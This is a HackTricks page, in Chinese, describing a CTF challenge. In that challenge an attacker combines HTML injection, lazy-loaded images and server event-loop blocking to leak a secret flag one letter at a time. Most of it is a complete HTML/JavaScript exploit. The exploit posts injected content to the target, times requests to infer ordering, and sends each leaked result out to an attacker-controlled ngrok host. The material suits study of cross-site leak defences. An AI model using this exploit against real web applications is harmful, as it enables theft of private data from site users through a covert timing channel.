Event Loop Blocking + Lazy images

支持 HackTricks

这个漏洞 中,@aszx87410 通过 HTML 注入混合了 懒加载图像侧信道 技术和某种 事件循环阻塞技术 来泄露字符。

这是一个 不同的漏洞,用于 CTF 挑战,已经在以下页面中评论过。请查看以获取有关挑战的更多信息:

Connection Pool Examples

这个漏洞背后的想法是:

  • 帖子按字母顺序加载

  • 一个 攻击者 可以 注入 一个以 "A" 开头的 帖子,然后一些 HTML 标签(如一个大的 <canvas)将占据大部分 屏幕,以及一些最终的 <img lazy 标签 来加载内容。

  • 如果攻击者注入的帖子是以 "z" 开头的同一个帖子,带有 标志帖子 将会 首先出现,然后 注入的 帖子 将以初始 "z" 和 canvas 出现。由于带有标志的帖子首先出现,第一个 canvas 将占据整个屏幕,最终注入的 <img lazy 标签将 不会在 屏幕上 显示,因此它们 不会被加载

  • 然后, 机器人 访问 页面时,攻击者发送获取请求

  • 如果注入的 图像 正在 加载,这些 获取 请求将需要 更长时间,因此攻击者知道 帖子在标志之前(按字母顺序)。

  • 如果 获取 请求是 快速的,这意味着 帖子 在标志 之后(按字母顺序)。

让我们检查代码:

<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>
支持 HackTricks

Last updated